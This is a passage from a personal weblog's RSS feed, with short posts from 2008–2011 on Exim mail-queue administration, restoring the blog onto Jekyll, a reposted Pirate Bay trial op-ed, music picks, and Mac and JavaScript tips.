  6005. Also when working at concerts and festivals you receive a badge identifiying you as staff. I regularly keep these as souvenirs which remind me of the amazing times passed at those events.</p>
  6006. <p>Over the time there are now a couple of badges hanging on my closet and I think it would be nice to be able to look through them on my laptop. Thus this new <a href="https://blog.x-way.org/Badges" title="Badges">Badges</a> category in the weblog.</p>
  6007. <p>My idea for now is to put a new badge online every day until Christmas like some form of an Advent calendar.</p>
  6008. <p>Here is the first one, it is from the <a href="http://www.swissipv6council.ch/en/events/business-konferenz-zurich-dezember" title="IPv6 Business Konferenz">IPv6 Business Konferenz</a>:<br>
  6009. <img src="https://blog.x-way.org/images/badges/IPv6_Konferenz_2011.jpeg" alt="IPv6 Konferenz 2011" height="161" width="247">
  6010. </p>
  6011. ]]></description>
  6012.    <content:encoded><![CDATA[<p>When attending conferences you often receive a badge granting you access (which usually is not much more than a nametag with some logo).
  6013. Also when working at concerts and festivals you receive a badge identifiying you as staff. I regularly keep these as souvenirs which remind me of the amazing times passed at those events.</p>
  6014. <p>Over the time there are now a couple of badges hanging on my closet and I think it would be nice to be able to look through them on my laptop. Thus this new <a href="https://blog.x-way.org/Badges" title="Badges">Badges</a> category in the weblog.</p>
  6015. <p>My idea for now is to put a new badge online every day until Christmas like some form of an Advent calendar.</p>
  6016. <p>Here is the first one, it is from the <a href="http://www.swissipv6council.ch/en/events/business-konferenz-zurich-dezember" title="IPv6 Business Konferenz">IPv6 Business Konferenz</a>:<br>
  6017. <img src="https://blog.x-way.org/images/badges/IPv6_Konferenz_2011.jpeg" alt="IPv6 Konferenz 2011" height="161" width="247">
  6018. </p>
  6019. ]]></content:encoded>
  6020.  </item>
  6021.  
  6022.  <item>
  6023.    <title>Online Again</title>
  6024.    <link>https://blog.x-way.org/Misc/2011/11/26/Online-Again.html</link>
  6025.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324152</guid>
  6026.    <dc:creator>Andreas Jaggi</dc:creator>
  6027.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6028.    <pubDate>Sat, 26 Nov 2011 15:47:00 +0000</pubDate>
  6029.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6030.    <description><![CDATA[<p>The database which previously powered this weblog vanished without a trace two years ago and people only got some PHP/XML error when surfing this site since then. Unfortunately the last backup of the database was more than four years old...</p>
  6031. <p>To restore the content of this weblog the Webarchive from <a href="http://www.archive.org/" title="Archive.org">Archive.org</a> was parsed with the help of some scripts in order to extract the missing posts. The resulting data was cross-checked with the last database backup and the generated static RSS feed files. <br>Then all the posts with their meta information were converted and stored in the appropriate format for the new system. Finally the layout was migrated to the new system and some glue files were created in order to provide backwards compatibility for the old link format.</p>
  6032. <p>After two months of restore/migration/polishing work the weblog is now online again, powered by <a href="http://github.com/mojombo/jekyll">jekyll</a> and currently hosted with <a href="http://pages.github.com">GitHub Pages</a>.</p>
  6033. ]]></description>
  6034.    <content:encoded><![CDATA[<p>The database which previously powered this weblog vanished without a trace two years ago and people only got some PHP/XML error when surfing this site since then. Unfortunately the last backup of the database was more than four years old...</p>
  6035. <p>To restore the content of this weblog the Webarchive from <a href="http://www.archive.org/" title="Archive.org">Archive.org</a> was parsed with the help of some scripts in order to extract the missing posts. The resulting data was cross-checked with the last database backup and the generated static RSS feed files. <br>Then all the posts with their meta information were converted and stored in the appropriate format for the new system. Finally the layout was migrated to the new system and some glue files were created in order to provide backwards compatibility for the old link format.</p>
  6036. <p>After two months of restore/migration/polishing work the weblog is now online again, powered by <a href="http://github.com/mojombo/jekyll">jekyll</a> and currently hosted with <a href="http://pages.github.com">GitHub Pages</a>.</p>
  6037. ]]></content:encoded>
  6038.  </item>
  6039.  
  6040.  <item>
  6041.    <title>Unfreeze messages in Exim queue</title>
  6042.    <link>https://blog.x-way.org/Linux/2009/07/28/Unfreeze-messages-in-Exim-queue.html</link>
  6043.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324151</guid>
  6044.    <dc:creator>Andreas Jaggi</dc:creator>
  6045.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6046.    <pubDate>Tue, 28 Jul 2009 22:25:00 +0000</pubDate>
  6047.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6048.    <description><![CDATA[<p>To process all **frozen** messages in the Exim queue use this command:</p>
  6049.  
  6050. <pre>mailq | grep frozen | awk '{print $3}' | xargs exim -v -M</pre>
  6051. ]]></description>
  6052.    <content:encoded><![CDATA[<p>To process all **frozen** messages in the Exim queue use this command:</p>
  6053.  
  6054. <pre>mailq | grep frozen | awk '{print $3}' | xargs exim -v -M</pre>
  6055. ]]></content:encoded>
  6056.  </item>
  6057.  
  6058.  <item>
  6059.    <title>Remove all messages in the Exim queue</title>
  6060.    <link>https://blog.x-way.org/Linux/2009/03/10/Remove-all-messages-in-the-Exim-queue.html</link>
  6061.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324150</guid>
  6062.    <dc:creator>Andreas Jaggi</dc:creator>
  6063.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6064.    <pubDate>Tue, 10 Mar 2009 14:50:00 +0000</pubDate>
  6065.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6066.    <description><![CDATA[<p>To whipe the Exim message queue use the following command:</p>
  6067.  
  6068. <pre>exim -bp | exiqgrep -i | xargs exim -Mrm</pre>
  6069. ]]></description>
  6070.    <content:encoded><![CDATA[<p>To whipe the Exim message queue use the following command:</p>
  6071.  
  6072. <pre>exim -bp | exiqgrep -i | xargs exim -Mrm</pre>
  6073. ]]></content:encoded>
  6074.  </item>
  6075.  
  6076.  <item>
  6077.    <title>Prevent Exim4 from using up all disk space on Debian</title>
  6078.    <link>https://blog.x-way.org/Linux/2009/03/06/Prevent-Exim4-from-using-up-all-disk-space-on-Debian.html</link>
  6079.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324149</guid>
  6080.    <dc:creator>Andreas Jaggi</dc:creator>
  6081.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6082.    <pubDate>Fri, 06 Mar 2009 10:20:00 +0000</pubDate>
  6083.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  6084.    <description><![CDATA[<p>Adding the following line to the Exim4 configuration prevents that all the disk space is used up by the messages in the spool folder:</p>
  6085.  
  6086. <pre>check_spool_space=100M</pre>
  6087.  
  6088. <p>
  6089.  
  6090. This refuses incoming messages with a "452 Space shortage, please try later" message when less than 100 megabytes of disk space are available on the partition where the spool folder resides.
  6091.  
  6092. </p>
  6093. ]]></description>
  6094.    <content:encoded><![CDATA[<p>Adding the following line to the Exim4 configuration prevents that all the disk space is used up by the messages in the spool folder:</p>
  6095.  
  6096. <pre>check_spool_space=100M</pre>
  6097.  
  6098. <p>
  6099.  
  6100. This refuses incoming messages with a "452 Space shortage, please try later" message when less than 100 megabytes of disk space are available on the partition where the spool folder resides.
  6101.  
  6102. </p>
  6103. ]]></content:encoded>
  6104.  </item>
  6105.  
  6106.  <item>
  6107.    <title>PDM TODO Performance</title>
  6108.    <link>https://blog.x-way.org/School/2009/03/04/PDM-TODO-Performance.html</link>
  6109.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324148</guid>
  6110.    <dc:creator>Andreas Jaggi</dc:creator>
  6111.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6112.    <pubDate>Wed, 04 Mar 2009 16:23:00 +0000</pubDate>
  6113.    <category domain="https://blog.x-way.org/School">School</category>
  6114.    <description><![CDATA[<p>
  6115.  
  6116. <img src="https://blog.x-way.org/images/tbd.png" alt="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." title="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." width="576" height="403" style="border:0;">
  6117.  
  6118. </p>
  6119. ]]></description>
  6120.    <content:encoded><![CDATA[<p>
  6121.  
  6122. <img src="https://blog.x-way.org/images/tbd.png" alt="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." title="Yep, that's right: two days left to my personal deadline and just a little more than half of the TODOs done..." width="576" height="403" style="border:0;">
  6123.  
  6124. </p>
  6125. ]]></content:encoded>
  6126.  </item>
  6127.  
  6128.  <item>
  6129.    <title>Gmail problems</title>
  6130.    <link>https://blog.x-way.org/Misc/2009/02/24/Gmail-problems.html</link>
  6131.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324147</guid>
  6132.    <dc:creator>Andreas Jaggi</dc:creator>
  6133.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6134.    <pubDate>Tue, 24 Feb 2009 13:11:00 +0000</pubDate>
  6135.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6136.    <description><![CDATA[<p>This comment on the Gmail problems made my day:</p>
  6137.  
  6138. <blockquote><p>
  6139.  
  6140. They're testing their new offline feature :)
  6141.  
  6142. </p></blockquote>
  6143.  
  6144. <p>(<a href="http://www.reddit.com/r/reddit.com/comments/7ztuo/gmail_down_im_getting_server_error_the_server/" title="reddit.com">via</a>)</p>
  6145. ]]></description>
  6146.    <content:encoded><![CDATA[<p>This comment on the Gmail problems made my day:</p>
  6147.  
  6148. <blockquote><p>
  6149.  
  6150. They're testing their new offline feature :)
  6151.  
  6152. </p></blockquote>
  6153.  
  6154. <p>(<a href="http://www.reddit.com/r/reddit.com/comments/7ztuo/gmail_down_im_getting_server_error_the_server/" title="reddit.com">via</a>)</p>
  6155. ]]></content:encoded>
  6156.  </item>
  6157.  
  6158.  <item>
  6159.    <title>Music for a hard wake-up in the morning II</title>
  6160.    <link>https://blog.x-way.org/Music/2009/02/21/Music-for-a-hard-wake-up-in-the-morning-II.html</link>
  6161.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324146</guid>
  6162.    <dc:creator>Andreas Jaggi</dc:creator>
  6163.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6164.    <pubDate>Sat, 21 Feb 2009 13:28:00 +0000</pubDate>
  6165.    <category domain="https://blog.x-way.org/Music">Music</category>
  6166.    <description><![CDATA[<p><strong>Tagada Jones &mdash; Une fois de plus (Industrial Version)</strong></p>
  6167.  
  6168. <p><a href="http://www.tagadajones.com/" title="Tagada Jones"><img src="https://blog.x-way.org/images/unefoisdetrop.jpg" height="256" width="256" alt="Tagada Jones - 1 fois de plus" style="border: 0;"></a></p>
  6169. ]]></description>
  6170.    <content:encoded><![CDATA[<p><strong>Tagada Jones &mdash; Une fois de plus (Industrial Version)</strong></p>
  6171.  
  6172. <p><a href="http://www.tagadajones.com/" title="Tagada Jones"><img src="https://blog.x-way.org/images/unefoisdetrop.jpg" height="256" width="256" alt="Tagada Jones - 1 fois de plus" style="border: 0;"></a></p>
  6173. ]]></content:encoded>
  6174.  </item>
  6175.  
  6176.  <item>
  6177.    <title>Music for a hard wake-up in the morning</title>
  6178.    <link>https://blog.x-way.org/Music/2009/02/19/Music-for-a-hard-wake-up-in-the-morning.html</link>
  6179.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324145</guid>
  6180.    <dc:creator>Andreas Jaggi</dc:creator>
  6181.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6182.    <pubDate>Thu, 19 Feb 2009 17:24:00 +0000</pubDate>
  6183.    <category domain="https://blog.x-way.org/Music">Music</category>
  6184.    <description><![CDATA[<p><strong>Die Toten Hosen &mdash; Strom</strong></p>
  6185.  
  6186. <p><a href="https://youtu.be/oX0w21HMkxU" title="Die Toten Hosen - Strom - YouTube">Die Toten Hosen - Strom</a></p>
  6187. ]]></description>
  6188.    <content:encoded><![CDATA[<p><strong>Die Toten Hosen &mdash; Strom</strong></p>
  6189.  
  6190. <p><a href="https://youtu.be/oX0w21HMkxU" title="Die Toten Hosen - Strom - YouTube">Die Toten Hosen - Strom</a></p>
  6191. ]]></content:encoded>
  6192.  </item>
  6193.  
  6194.  <item>
  6195.    <title>The Pirate Bay Trial op-editorial</title>
  6196.    <link>https://blog.x-way.org/Misc/2009/02/16/The-Pirate-Bay-Trial-op-editorial.html</link>
  6197.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324144</guid>
  6198.    <dc:creator>Andreas Jaggi</dc:creator>
  6199.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6200.    <pubDate>Mon, 16 Feb 2009 20:46:00 +0000</pubDate>
  6201.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6202.    <description><![CDATA[<p>The trial against The Pirate Bay that started today in Stockholm, Sweden are one of the most important issues of our time. Our adversaries basically wants to close down internets and remodel it into something similar of a sodamachine serving entertainment. During the trial, the prosecutor together with a coterie of representatives for a disabled business model will put up a tacky theater by telling stories designed to convince the court that The Pirate Bay infact is a menace to society.</p>
  6203.  
  6204. <p>What differs this trial from most earlier trials is that everything in and surrounding it will whirl round and round in diverse channels of communication; to be discussed, reinterpreted, copied and critizised. Every crack in their appeal will be penetrated by the gaze of thousands upon thousands of eyes on the internets, in all the channels covering the trial. Old cliches from the antipiracy lobby wont stick. You won’t be able to say stuff like, ”you can’t compete with free” or ”filesharing is theft” without a thousand voices making fun of you.</p>
  6205.  
  6206. <p>We will create numerous scenes where quite different plays will take place. In local channels like spectrial.bloggy.se where the immediate physical surroundings of the court are being discussed. ”Which cafés nearby will give us connection?” ”How can we get electricity to the bus?” But also in international channels like Twitter, where right now the torrent of information is being translated into fifteen different languages. Translations and coverage being made by ordinary users of internets. Volunteers sign up to make trial-tourist guides to the surroundings, drive the bus or hook up audio. People fly in from far away countries to cover the trial and tell the world their video story of the Sweden they see.</p>
  6207.  
  6208. <p>Here all participants are potential actors in the Spectrial. Our channels form a meltingpot of reporting and engagement.</p>
  6209.  
  6210. <p>Our communication around the spectacle aims in no way towards an objective report on an external chain of events. Rather, the trial is a hub around which a whole new network of actors is instigated. Neither is the spectacle a question of old media against digital, social medias. Our social medias include a paper fanzine and a 32 year old bus, connecting us and others physically.</p>
  6211.  
  6212. <p>It’s not about the protocols nor the technology. It’s about using these to create new congregations, where anyone is invited and anyone can find their role, build new scenes and make their own performances.</p>
  6213.  
  6214. <p>The future is built by us. Us who participate in conversations. The future is built by us who explore how information and performativity is coming together. To refuse a debate and still expect to be able to charge consumers is since long a closed door. To also try and outlaw certain types of conversations is downright disgraceful.</p>
  6215.  
  6216. <p>The coverage of the trial is not unique in these qualities. More and more areas see the creation of conversations on and the exploration of new stances on culture and cultural economy. A gigantic collective exploration has set sails. Every route differs from the other. But they have one thing in common: The industry interests that the state is representing are never present in these conversations. This is why they wont be part in building the future.</p>
  6217.  
  6218. <p>maintain hardline kopimi</p>
  6219.  
  6220. <p>The Bureau for Piracy and The Pirate Bay<br>
  6221.  
  6222. via the internets</p>
  6223.  
  6224. <p>this article was translated by proud peers of The Pirate Bay
  6225.  
  6226. trial.thepiratebay.org</p>
  6227.  
  6228. <p>
  6229.  
  6230. (<a href="https://web.archive.org/web/20090221093327/http://trial.thepiratebay.org/2009/02/16/publish-as-us-in-your-country/" title="Publish as us, in your country (archive.org)">via</a>)
  6231.  
  6232. </p>
  6233. ]]></description>
  6234.    <content:encoded><![CDATA[<p>The trial against The Pirate Bay that started today in Stockholm, Sweden are one of the most important issues of our time. Our adversaries basically wants to close down internets and remodel it into something similar of a sodamachine serving entertainment. During the trial, the prosecutor together with a coterie of representatives for a disabled business model will put up a tacky theater by telling stories designed to convince the court that The Pirate Bay infact is a menace to society.</p>
  6235.  
  6236. <p>What differs this trial from most earlier trials is that everything in and surrounding it will whirl round and round in diverse channels of communication; to be discussed, reinterpreted, copied and critizised. Every crack in their appeal will be penetrated by the gaze of thousands upon thousands of eyes on the internets, in all the channels covering the trial. Old cliches from the antipiracy lobby wont stick. You won’t be able to say stuff like, ”you can’t compete with free” or ”filesharing is theft” without a thousand voices making fun of you.</p>
  6237.  
  6238. <p>We will create numerous scenes where quite different plays will take place. In local channels like spectrial.bloggy.se where the immediate physical surroundings of the court are being discussed. ”Which cafés nearby will give us connection?” ”How can we get electricity to the bus?” But also in international channels like Twitter, where right now the torrent of information is being translated into fifteen different languages. Translations and coverage being made by ordinary users of internets. Volunteers sign up to make trial-tourist guides to the surroundings, drive the bus or hook up audio. People fly in from far away countries to cover the trial and tell the world their video story of the Sweden they see.</p>
  6239.  
  6240. <p>Here all participants are potential actors in the Spectrial. Our channels form a meltingpot of reporting and engagement.</p>
  6241.  
  6242. <p>Our communication around the spectacle aims in no way towards an objective report on an external chain of events. Rather, the trial is a hub around which a whole new network of actors is instigated. Neither is the spectacle a question of old media against digital, social medias. Our social medias include a paper fanzine and a 32 year old bus, connecting us and others physically.</p>
  6243.  
  6244. <p>It’s not about the protocols nor the technology. It’s about using these to create new congregations, where anyone is invited and anyone can find their role, build new scenes and make their own performances.</p>
  6245.  
  6246. <p>The future is built by us. Us who participate in conversations. The future is built by us who explore how information and performativity is coming together. To refuse a debate and still expect to be able to charge consumers is since long a closed door. To also try and outlaw certain types of conversations is downright disgraceful.</p>
  6247.  
  6248. <p>The coverage of the trial is not unique in these qualities. More and more areas see the creation of conversations on and the exploration of new stances on culture and cultural economy. A gigantic collective exploration has set sails. Every route differs from the other. But they have one thing in common: The industry interests that the state is representing are never present in these conversations. This is why they wont be part in building the future.</p>
  6249.  
  6250. <p>maintain hardline kopimi</p>
  6251.  
  6252. <p>The Bureau for Piracy and The Pirate Bay<br>
  6253.  
  6254. via the internets</p>
  6255.  
  6256. <p>this article was translated by proud peers of The Pirate Bay
  6257.  
  6258. trial.thepiratebay.org</p>
  6259.  
  6260. <p>
  6261.  
  6262. (<a href="https://web.archive.org/web/20090221093327/http://trial.thepiratebay.org/2009/02/16/publish-as-us-in-your-country/" title="Publish as us, in your country (archive.org)">via</a>)
  6263.  
  6264. </p>
  6265. ]]></content:encoded>
  6266.  </item>
  6267.  
  6268.  <item>
  6269.    <title>1234567890</title>
  6270.    <link>https://blog.x-way.org/Misc/2009/02/14/1234567890.html</link>
  6271.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324143</guid>
  6272.    <dc:creator>Andreas Jaggi</dc:creator>
  6273.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6274.    <pubDate>Sat, 14 Feb 2009 00:31:00 +0000</pubDate>
  6275.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6276.    <description><![CDATA[<p><a href="http://www.1234567890day.com/" title="1234567890">1234567890day.com</a></p>
  6277. ]]></description>
  6278.    <content:encoded><![CDATA[<p><a href="http://www.1234567890day.com/" title="1234567890">1234567890day.com</a></p>
  6279. ]]></content:encoded>
  6280.  </item>
  6281.  
  6282.  <item>
  6283.    <title>Unicode Snowman</title>
  6284.    <link>https://blog.x-way.org/Misc/2008/10/09/Unicode-Snowman.html</link>
  6285.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324141</guid>
  6286.    <dc:creator>Andreas Jaggi</dc:creator>
  6287.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6288.    <pubDate>Thu, 09 Oct 2008 15:50:00 +0000</pubDate>
  6289.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6290.    <description><![CDATA[<p style="font-size: 200px;">&#9731;</p>
  6291.  
  6292. <p><a href="http://unicodesnowmanforyou.com/" title="Unicode Snowman for You">via</a></p>
  6293. ]]></description>
  6294.    <content:encoded><![CDATA[<p style="font-size: 200px;">&#9731;</p>
  6295.  
  6296. <p><a href="http://unicodesnowmanforyou.com/" title="Unicode Snowman for You">via</a></p>
  6297. ]]></content:encoded>
  6298.  </item>
  6299.  
  6300.  <item>
  6301.    <title>Use EPFL Exchange on the iPhone / iPod touch</title>
  6302.    <link>https://blog.x-way.org/Misc/2008/09/04/Use-EPFL-Exchange-on-the-iPhone--iPod-touch.html</link>
  6303.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324140</guid>
  6304.    <dc:creator>Andreas Jaggi</dc:creator>
  6305.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6306.    <pubDate>Thu, 04 Sep 2008 19:59:00 +0000</pubDate>
  6307.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6308.    <description><![CDATA[<p>As EPFL is migrating all its E-Mail services to Exchange, lets use the Exchange functionalities of the iPhone/iPod touch.<br>Here's the configuration to make it work:</p>
  6309.  
  6310. <ul>
  6311.  
  6312. <li>E-Mail: firstname.lastname@epfl.ch</li>
  6313.  
  6314. <li>Server: ewa.epfl.ch</li>
  6315.  
  6316. <li>Username: studentsusername</li>
  6317.  
  6318. <li>Password: ********************</li>
  6319.  
  6320. </ul>
  6321. ]]></description>
  6322.    <content:encoded><![CDATA[<p>As EPFL is migrating all its E-Mail services to Exchange, lets use the Exchange functionalities of the iPhone/iPod touch.<br>Here's the configuration to make it work:</p>
  6323.  
  6324. <ul>
  6325.  
  6326. <li>E-Mail: firstname.lastname@epfl.ch</li>
  6327.  
  6328. <li>Server: ewa.epfl.ch</li>
  6329.  
  6330. <li>Username: studentsusername</li>
  6331.  
  6332. <li>Password: ********************</li>
  6333.  
  6334. </ul>
  6335. ]]></content:encoded>
  6336.  </item>
  6337.  
  6338.  <item>
  6339.    <title>Disc of this Summer: La Phaze - Miracle</title>
  6340.    <link>https://blog.x-way.org/Music/2008/08/21/Disc-of-this-Summer-La-Phaze---Miracle.html</link>
  6341.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324139</guid>
  6342.    <dc:creator>Andreas Jaggi</dc:creator>
  6343.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6344.    <pubDate>Thu, 21 Aug 2008 06:31:00 +0000</pubDate>
  6345.    <category domain="https://blog.x-way.org/Music">Music</category>
  6346.    <description><![CDATA[<p><a href="http://www.laphaze.com/"><img src="https://blog.x-way.org/images/la_phaze_miracle.jpg" height="240" width="240" style="border: 0;" alt="La Phaze - Miracle"></a></p>
  6347. ]]></description>
  6348.    <content:encoded><![CDATA[<p><a href="http://www.laphaze.com/"><img src="https://blog.x-way.org/images/la_phaze_miracle.jpg" height="240" width="240" style="border: 0;" alt="La Phaze - Miracle"></a></p>
  6349. ]]></content:encoded>
  6350.  </item>
  6351.  
  6352.  <item>
  6353.    <title>Opera 9.25 vs Safari JavaScript syntax error forgiveness</title>
  6354.    <link>https://blog.x-way.org/Coding/2008/08/09/Opera-925-vs-Safari-JavaScript-syntax-error-forgiveness.html</link>
  6355.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324138</guid>
  6356.    <dc:creator>Andreas Jaggi</dc:creator>
  6357.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6358.    <pubDate>Sat, 09 Aug 2008 01:15:00 +0000</pubDate>
  6359.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  6360.    <description><![CDATA[<p>The following definition of an Array works without problems in Safari (and probably Firefox too), but triggers an (legitimate) error in Opera 9.25:</p>
  6361.  
  6362. <pre>var myArray = [
  6363.  
  6364. 1.2,
  6365.  
  6366. 2.3,
  6367.  
  6368. 3.4,
  6369.  
  6370. ];</pre>
  6371.  
  6372. <p>The error is triggered by the superfluous comma after the last element of the Array. It may be argued for both behaviors, but I would prefer all Browsers accepting such an Array definition also since in other languages (C, Python, PHP) such a redundant comma does not cause any trouble.</p>
  6373. ]]></description>
  6374.    <content:encoded><![CDATA[<p>The following definition of an Array works without problems in Safari (and probably Firefox too), but triggers an (legitimate) error in Opera 9.25:</p>
  6375.  
  6376. <pre>var myArray = [
  6377.  
  6378. 1.2,
  6379.  
  6380. 2.3,
  6381.  
  6382. 3.4,
  6383.  
  6384. ];</pre>
  6385.  
  6386. <p>The error is triggered by the superfluous comma after the last element of the Array. It may be argued for both behaviors, but I would prefer all Browsers accepting such an Array definition also since in other languages (C, Python, PHP) such a redundant comma does not cause any trouble.</p>
  6387. ]]></content:encoded>
  6388.  </item>
  6389.  
  6390.  <item>
  6391.    <title>Fast disk upgrade for my MacBook Pro</title>
  6392.    <link>https://blog.x-way.org/Mac/2008/08/02/Fast-disk-upgrade-for-my-MacBook-Pro.html</link>
  6393.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324137</guid>
  6394.    <dc:creator>Andreas Jaggi</dc:creator>
  6395.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6396.    <pubDate>Sat, 02 Aug 2008 07:58:00 +0000</pubDate>
  6397.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  6398.    <description><![CDATA[<p>Here's how to upgrade the disk of a MacBook Pro in 45 minutes while keeping all your data/settings/applications:</p>
  6399.  
  6400. <ol>
  6401.  
  6402. <li>Uninstall <a href="http://refit.sourceforge.net/" title="rEFIt - An EFI Boot Menu and Toolkit">rEFIt</a> and make sure your MBP restarts with the Apple 'default' bootloader</li>
  6403.  
  6404. <li>Follow the <a href="http://www.ifixit.com/Guide/Mac/" title="Fixit Guide - DIY PowerBook, MacBook, &amp; iBook Repair &amp; Disassembly">iFixit Guide</a> to replace your disk</li>
  6405.  
  6406. <li>Put the old disk in a SATA-to-USB case (they are available for $7.89 from <a href="https://www.newegg.com/">Newegg.com</a>)</li>
  6407.  
  6408. <li>Connect the old disk to your MBP and turn the MBP on. (The MBP automagically recognizes the old system and runs it)</li>
  6409.  
  6410. <li>Open the Disk Manager and partition your new disk.</li>
  6411.  
  6412. <li>Select your new 'system' Volume and open the "Restore" tab.</li>
  6413.  
  6414. <li>Drag your old 'system' Volume to the "Source" field and your new 'system' Volume to the "Target" field. Click on "Restore", the contents of your old disk are now copied to the new disk.</li>
  6415.  
  6416. <li>After the restore process finishes, shutdown your MBP.</li>
  6417.  
  6418. <li>Disconnect your old disk and turn on your MBP.</li>
  6419.  
  6420. <li>Voilà. You are booting from the new disk and all your data/settings/applications are there too!</li>
  6421.  
  6422. </ol>
  6423. ]]></description>
  6424.    <content:encoded><![CDATA[<p>Here's how to upgrade the disk of a MacBook Pro in 45 minutes while keeping all your data/settings/applications:</p>
  6425.  
  6426. <ol>
  6427.  
  6428. <li>Uninstall <a href="http://refit.sourceforge.net/" title="rEFIt - An EFI Boot Menu and Toolkit">rEFIt</a> and make sure your MBP restarts with the Apple 'default' bootloader</li>
  6429.  
  6430. <li>Follow the <a href="http://www.ifixit.com/Guide/Mac/" title="Fixit Guide - DIY PowerBook, MacBook, &amp; iBook Repair &amp; Disassembly">iFixit Guide</a> to replace your disk</li>
  6431.  
  6432. <li>Put the old disk in a SATA-to-USB case (they are available for $7.89 from <a href="https://www.newegg.com/">Newegg.com</a>)</li>
  6433.  
  6434. <li>Connect the old disk to your MBP and turn the MBP on. (The MBP automagically recognizes the old system and runs it)</li>
  6435.  
  6436. <li>Open the Disk Manager and partition your new disk.</li>
  6437.  
  6438. <li>Select your new 'system' Volume and open the "Restore" tab.</li>
  6439.  
  6440. <li>Drag your old 'system' Volume to the "Source" field and your new 'system' Volume to the "Target" field. Click on "Restore", the contents of your old disk are now copied to the new disk.</li>
  6441.  
  6442. <li>After the restore process finishes, shutdown your MBP.</li>
  6443.  
  6444. <li>Disconnect your old disk and turn on your MBP.</li>
  6445.  
  6446. <li>Voilà. You are booting from the new disk and all your data/settings/applications are there too!</li>
  6447.  
  6448. </ol>
  6449. ]]></content:encoded>
  6450.  </item>
  6451.  
  6452.  <item>
  6453.    <title>Handy Photos</title>
  6454.    <link>https://blog.x-way.org/Misc/2008/07/19/Handy-Photos.html</link>
  6455.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324136</guid>
  6456.    <dc:creator>Andreas Jaggi</dc:creator>
  6457.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  6458.    <pubDate>Sat, 19 Jul 2008 15:42:00 +0000</pubDate>
  6459.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  6460.    <description><![CDATA[<a href="https://blog.x-way.org/images/handy-scaled-00.jpg"><img src="https://blog.x-way.org/images/handy-thumb-00.jpg" alt="handy-scaled-0.jpg"></a><br>
  6461.  
  6462. <a href="https://blog.x-way.org/images/handy-scaled-01.jpg"><img src="https://blog.x-way.org/images/handy-thumb-01.jpg" alt="handy-scaled-1.jpg"></a><br>
  6463.  
  6464. <a href="https://blog.x-way.org/images/handy-scaled-12.jpg"><img src="https://blog.x-way.org/images/handy-thumb-12.jpg" alt="handy-scaled-12.jpg"></a><br>
  6465.  
  6466. <a href="https://blog.x-way.org/images/handy-scaled-23.jpg"><img src="https://blog.x-way.org/images/handy-thumb-23.jpg" alt="handy-scaled-23.jpg"></a><br>
  6467.  
  6468. <a href="https://blog.x-way.org/images/handy-scaled-34.jpg"><img src="https://blog.x-way.org/images/handy-thumb-34.jpg" alt="handy-scaled-34.jpg"></a><br>
  6469.  
  6470. <a href="https://blog.x-way.org/images/handy-scaled-42.jpg"><img src="https://blog.x-way.org/images/handy-thumb-42.jpg" alt="handy-scaled-42.jpg"></a><br>
  6471.  
  6472. <a href="https://blog.x-way.org/images/handy-scaled-43.jpg"><img src="https://blog.x-way.org/images/handy-thumb-43.jpg" alt="handy-scaled-43.jpg"></a><br>
  6473.  
  6474. <a href="https://blog.x-way.org/images/handy-scaled-44.jpg"><img src="https://blog.x-way.org/images/handy-thumb-44.jpg" alt="handy-scaled-44.jpg"></a><br>
  6475.  
